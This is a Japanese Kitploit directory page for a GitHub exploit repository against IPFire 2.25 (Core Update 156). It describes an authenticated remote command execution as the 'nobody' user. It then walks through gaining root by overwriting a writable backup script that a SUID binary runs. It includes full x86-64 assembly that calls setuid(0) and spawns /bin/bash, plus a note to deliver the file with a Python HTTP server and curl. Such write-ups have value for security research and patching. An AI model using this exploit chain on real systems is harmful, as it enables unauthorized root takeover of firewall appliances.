Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ipfire-2-25-auth-rce — ipfire 2.25 認証済みリモートコード実行 | Kitploit
ツール/GitHubGitHub/kaanaryoverflow/ipfire-2-25-auth-rce
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペイロード開発バイナリエクスプロイト
GitHubkaanaryoverflow/ipfire-2-25-auth-rce

ipfire-2-25-auth-rce

ipfire 2.25 認証済みリモートコード実行

リポジトリを見る
25年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Ipfire 2-25 (コアアップデート156) 認証済みRCE

  • 任意のパッケージをインストールする際、システムがコマンドを実行します

packfileinstallation

  • システムはHTMLのみから7zipを取得しています

pocpc0

  • そしてtmpディレクトリを確認します

pocpc1

  • バージョン2.25 - コアアップデート156

version

  • ipfireはログイン後にnobodyとして任意のOSコマンドを実行できます

rootになろう!

  • SUIDバイナリを確認します

find-suid

  • バックアッププログラムは別のスクリプトを実行します。/var/ipfire/backup/bin/backup.pl(これはbashスクリプトで、権限は良好そうです)

backup-tespiti

  • bashスクリプトへの書き込みを試みます。(エラーなし。良い!)

yazma-denemesi

  • bashの実行を試みます

yazabilme-kanıtı

  • はい、実行できますが、低権限です。setuid(0)をトリガーしなければなりません!
  • これを保存して実行します alti name.asm q
  • altiはsoo_deepリポジトリにある私自身のコンパイルチェックプログラムです。
root@kitploit:~
bits 64
section .data
  string db "/bin/bash",0x00
  olmadis db "basarisiz.",0x0a,0x00
  olmadil equ $-olmadis
section .text
  global main
main:
  mov rax,105
  mov rdi,0
  syscall
  cmp rax,0
  je getbash

  mov rax,1
  mov rdi,1
  mov rsi,olmadis
  mov rdx,olmadil
  syscall

  mov rax,60
  xor rdi,rdi
  syscall

getbash:
  mov rax,59
  mov rdi,string
  mov rsi,0
  mov rdx,0
  syscall
  • そして、新しいプログラムを /var/ipfire/backup/bin/backup.pl に書き込みます。(書き込むにはPythonのHTTPサーバーとcurlを使用できます)

  • そして、rootシェルを楽しみましょう!

image

ツールをダウンロード